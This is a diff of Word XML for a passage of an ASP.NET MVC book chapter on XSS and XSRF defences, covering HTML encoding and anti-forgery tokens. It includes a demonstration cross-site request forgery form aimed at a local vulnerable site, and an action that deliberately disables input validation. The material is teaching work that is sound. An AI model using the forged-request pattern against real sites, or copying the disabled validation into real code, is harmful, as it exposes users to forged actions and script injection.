         <w:t xml:space="preserve">t to be executed by the browser (figure 11.2). Instead, we should have HTML encoded the comment.  HTML encoding transforms text from HTML that is interpreted by the browser into symbols that the browser will render without interpretation. Instead of our script being parsed and executed, it would have simply been displayed as text.  In our view we rendered the comment with this markup: </w:t>
@@ -1549,7 +2278,21 @@
         <w:rPr>
           <w:rStyle w:val="CodeinTable"/>
         </w:rPr>
-        <w:t>&lt;%= Model.Comment %&gt;</w:t>
+        <w:t xml:space="preserve">&lt;%= </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinTable"/>
+        </w:rPr>
+        <w:t>Model.Comment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinTable"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1600,7 +2343,37 @@
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>&lt;%= HttpUtility.HtmlEncode(Model.Comment) %&gt;</w:t>
+        <w:t xml:space="preserve">&lt;%= </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>HttpUtility.HtmlEncode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Model.Comment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>) %&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1613,7 +2386,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3948881"/>
@@ -1632,7 +2407,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11" cstate="print"/>
+                    <a:blip r:embed="rId12" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -1666,7 +2441,15 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Figure 11.4 Our script rendered harmlessly</w:t>
+        <w:t xml:space="preserve">Figure 11.4 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Our</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> script rendered harmlessly</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1682,7 +2465,15 @@
         <w:pStyle w:val="Sidebar"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">There's a new feature in ASP.NET 4 that allows developers to conveniently express HTML encoded output without using the HttpUtility.Encode helper function.  Instead of specifying output with </w:t>
+        <w:t xml:space="preserve">There's a new feature in ASP.NET 4 that allows developers to conveniently express HTML encoded output without using the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HttpUtility.Encode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> helper function.  Instead of specifying output with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1700,13 +2491,40 @@
         <w:t>&lt;%: "text" %&gt;</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">.  For more information, refer to Phil Haack's blog post: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
-        <w:r>
-          <w:t>http://haacked.com/archive/2009/09/25/html-encoding-code-nuggets.aspx</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:t xml:space="preserve">.  For more information, refer to Phil </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Haack's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> blog post: </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="10"/>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText>HYPERLINK "http://haacked.com/archive/2009/09/25/html-encoding-code-nuggets.aspx"</w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:t>http://haacked.com/archive/2009/09/25/html-encoding-code-nuggets.aspx</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:commentRangeEnd w:id="10"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="10"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1726,6 +2544,7 @@
       <w:pPr>
         <w:pStyle w:val="Head3"/>
       </w:pPr>
+      <w:commentRangeStart w:id="11"/>
       <w:r>
         <w:t>11.2.</w:t>
       </w:r>
@@ -1735,6 +2554,18 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:commentRangeEnd w:id="11"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:smallCaps w:val="0"/>
+          <w:vanish/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:commentReference w:id="11"/>
+      </w:r>
       <w:r>
         <w:t>ASP.NET MVC Defaults</w:t>
       </w:r>
@@ -1744,6 +2575,10 @@
         <w:pStyle w:val="Body1"/>
         <w:rPr>
           <w:rStyle w:val="Bold"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="0"/>
+          <w:smallCaps/>
+          <w:color w:val="960000"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1780,16 +2615,41 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Listing 11.8 [ValidateInput(false)]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[ValidateInput(false)]</w:t>
+        <w:t>Listing 11.8 [</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ValidateInput</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>false)]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ValidateInput</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>false)]</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                       #1</w:t>
@@ -1799,8 +2659,29 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:t>public ViewResult Save(CommentInput form)</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ViewResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Save(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CommentInput</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> form)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1817,7 +2698,14 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>return View(form);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> View(form);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1833,7 +2721,15 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1 ValidateInput attribute disabling protection</w:t>
+        <w:t xml:space="preserve">#1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ValidateInput</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attribute disabling protection</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1846,6 +2742,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3948881"/>
@@ -1914,7 +2813,6 @@
         <w:pStyle w:val="SidebarHead"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Smarter, safer browsers</w:t>
       </w:r>
     </w:p>
@@ -1923,7 +2821,15 @@
         <w:pStyle w:val="Sidebar"/>
       </w:pPr>
       <w:r>
-        <w:t>Chrome 4 and the Firefox extension NoScript provide input validation on the client.  They refuse to render any script that was present in the previous request.  While these measures are not fail-safe, they are useful tools users can employ to protect themselves against becoming victimized by certain web application vulnerabilities like XSS.</w:t>
+        <w:t xml:space="preserve">Chrome 4 and the Firefox extension </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoScript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> provide input validation on the client.  They refuse to render any script that was present in the previous request.  While these measures are not fail-safe, they are useful tools users can employ to protect themselves against becoming victimized by certain web application vulnerabilities like XSS.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1966,7 +2872,15 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t>In the example code for this chapter we've included a working XSRF demonstration. Again, there are two sites in the solution: a vulnerable one and the attacker.  The vulnerable site accepts a simple form post.  If you imagine the secure commands we issue in the course of a regular day - transferring funds between bank accounts, buying or selling securities, authorizing raises, it could be profitable for a hacker to formulate a special request on your behalf and have you unknowningly transmit it to a site you are known to visit.</w:t>
+        <w:t xml:space="preserve">In the example code for this chapter we've included a working XSRF demonstration. Again, there are two sites in the solution: a vulnerable one and the attacker.  The vulnerable site accepts a simple form post.  If you imagine the secure commands we issue in the course of a regular day - transferring funds between bank accounts, buying or selling securities, authorizing raises, it could be profitable for a hacker to formulate a special request on your behalf and have you </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>unknowningly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> transmit it to a site you are known to visit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1979,7 +2893,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3845642"/>
@@ -2040,7 +2956,22 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t>Behind the scenes in the bowels of the HTML source another story is told, shown in listing 11.9.</w:t>
+        <w:t xml:space="preserve">Behind the scenes in the </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="12"/>
+      <w:r>
+        <w:t xml:space="preserve">bowels of the HTML source </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="12"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="12"/>
+      </w:r>
+      <w:r>
+        <w:t>another story is told, shown in listing 11.9.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2048,23 +2979,51 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.9 XSRF source</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">&lt;form method="post" </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">action="http://localhost:8082/home/save"&gt; </w:t>
+        <w:t xml:space="preserve">Listing 11.9 </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="13"/>
+      <w:r>
+        <w:t>XSRF source</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="13"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:vanish/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:commentReference w:id="13"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>form</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> method="post" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>action</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">="http://localhost:8082/home/save"&gt; </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">   #1</w:t>
@@ -2083,15 +3042,28 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">&lt;input id="Name" name="Name" </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">type="hidden" value="gotcha!" /&gt; </w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>input</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> id="Name" name="Name" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>type</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">="hidden" value="gotcha!" /&gt; </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">            #2</w:t>
@@ -2110,7 +3082,15 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">&lt;button type="submit"&gt;Free!!&lt;/button&gt; </w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>button</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> type="submit"&gt;Free!!&lt;/button&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2150,24 +3130,28 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>When the aloof user clicks the button, the form is submitted.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  Not even the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> can save us now; we're already logged in! Figure 11.7 shows the result.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3845642"/>
@@ -2220,7 +3204,15 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Figure 11.7 The form is posted to the vulnerable site</w:t>
+        <w:t xml:space="preserve">Figure 11.7 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> form is posted to the vulnerable site</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2228,16 +3220,41 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t>A savvy attacker would have used javascript to submit our request, stifling the response from our browser so we'd never knew it occured - until it was too late.</w:t>
+        <w:t xml:space="preserve">A savvy attacker would have used </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to submit our request, stifling the response from our browser so we'd never knew it </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>occured</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> - until it was too late.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
       </w:pPr>
+      <w:commentRangeStart w:id="14"/>
       <w:r>
         <w:t>ASP.NET MVC 2 provides a simple mechanism for combating this vulnerability.</w:t>
       </w:r>
+      <w:commentRangeEnd w:id="14"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="14"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2246,9 +3263,11 @@
       <w:r>
         <w:t xml:space="preserve">11.3.2 </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2257,14 +3276,24 @@
       <w:r>
         <w:t xml:space="preserve">The </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
-      <w:r>
-        <w:t>, when applied to an action, requires that the input be accompanied by a special token that ensures its from the responding application only.  It must be used in tandem with a special HTML helper that outputs the token in the form in the HTML source.  Listing 11.10 shows the attribute on our vulnerable action.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, when applied to an action, requires that the input be accompanied by a special token that ensures </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> from the responding application only.  It must be used in tandem with a special HTML helper that outputs the token in the form in the HTML source.  Listing 11.10 shows the attribute on our vulnerable action.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2272,16 +3301,28 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.10 ValidateAntiForgeryTokenAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>[ValidateAntiForgeryToken]</w:t>
+        <w:t xml:space="preserve">Listing 11.10 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ValidateAntiForgeryToken</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>]</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                #1</w:t>
@@ -2291,8 +3332,29 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:t>public ViewResult Save(InputModel form)</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ViewResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Save(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>InputModel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> form)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2309,7 +3371,14 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>return View(form);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> View(form);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2341,15 +3410,48 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.11 Html.AntiForgeryToken()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;form method="post" action="/home/save"&gt;</w:t>
+        <w:t xml:space="preserve">Listing 11.11 </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="15"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Html.AntiForgeryToken</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="15"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:vanish/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:commentReference w:id="15"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>form</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> method="post" action="/home/save"&gt;</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
@@ -2360,7 +3462,20 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    &lt;%= Html.AntiForgeryToken() %&gt;</w:t>
+        <w:t xml:space="preserve">    &lt;%= </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Html.AntiForgeryToken</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>) %&gt;</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">          #1</w:t>
@@ -2371,23 +3486,52 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    &lt;label for="Name"&gt;Name:&lt;/label&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;%= Html.TextBox("Name") %&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;button type="submit"&gt;Submit&lt;/button&gt;</w:t>
+        <w:t xml:space="preserve">    &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>label</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> for="Name"&gt;Name:&lt;/label&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;%= </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Html.TextBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"Name") %&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>button</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> type="submit"&gt;Submit&lt;/button&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2403,7 +3547,15 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1 This provides a secure token</w:t>
+        <w:t xml:space="preserve">#1 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>This</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> provides a secure token</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2416,6 +3568,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3845642"/>
@@ -2468,8 +3623,15 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Figure 11.8 An exception is thrown if the request is not accompanied by a special token</w:t>
+        <w:t xml:space="preserve">Figure 11.8 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>An</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> exception is thrown if the request is not accompanied by a special token</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2482,12 +3644,14 @@
       <w:r>
         <w:t xml:space="preserve">The appropriate time to incorporate </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
@@ -2503,7 +3667,15 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
